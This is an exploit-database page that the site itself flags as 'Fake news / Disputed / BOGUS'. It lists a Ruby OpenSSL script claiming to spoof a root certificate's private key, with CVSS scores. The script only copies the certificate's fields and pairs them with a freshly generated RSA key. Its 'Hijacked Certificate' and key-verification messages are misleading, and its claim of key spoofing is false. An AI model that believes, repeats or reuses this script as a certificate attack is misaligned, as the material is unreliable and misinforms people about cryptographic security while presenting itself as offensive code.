WARNING! Fake news / Disputed / BOGUS

Ruby OpenSSL private key spoofing

2014.04.17
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: None

require 'rubygems' require 'openssl' require 'digest/md5' key = OpenSSL::PKey::RSA.new(2048) cipher = OpenSSL::Cipher::AES.new(256, :CBC) ctx = OpenSSL::SSL::SSLContext.new puts "Spoof must be in DER format and saved as root.cer" raw = File.read "root.cer" cert = OpenSSL::X509::Certificate.new raw cert.version = 2 ef = OpenSSL::X509::ExtensionFactory.new ef.issuer_certificate = OpenSSL::X509::Certificate.new raw cert.subject = ef.issuer_certificate.subject ef.subject_certificate = ef.issuer_certificate cert.issuer = ef.issuer_certificate.issuer cert.serial = ef.issuer_certificate.serial ctx.key = ef.issuer_certificate.public_key cert.public_key = ef.issuer_certificate.public_key cert.not_after = ef.issuer_certificate.not_after cert.not_before = ef.issuer_certificate.not_before cert.extensions = ef.issuer_certificate.extensions a = File.open("root"".key", "w") a.syswrite("#{cert.public_key}") a.syswrite("#{key.to_pem}") spoof = OpenSSL::PKey::RSA.new File.read 'root.key' printf "Verifying Keys Work: " puts spoof.private? ctx.cert = ef.issuer_certificate puts "=============================================================" root = ef.issuer_certificate.sign(spoof, OpenSSL::Digest::SHA1.new) filer = File.open("#{cert.serial}"".key", "w") filer.syswrite("#{spoof.to_pem}") file = File.open("spoof"".cer", "w") file.syswrite("#{cert.to_der}") files = File.open("#{cert.serial}"".pem", "w") files.syswrite("#{cert.to_pem}") files.syswrite("#{spoof.to_pem}") puts "Hijacked Certificate with chainloaded key saved @ #{cert.serial}.pem" printf "Verifying Keys Intergity: " puts root.verify(key)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top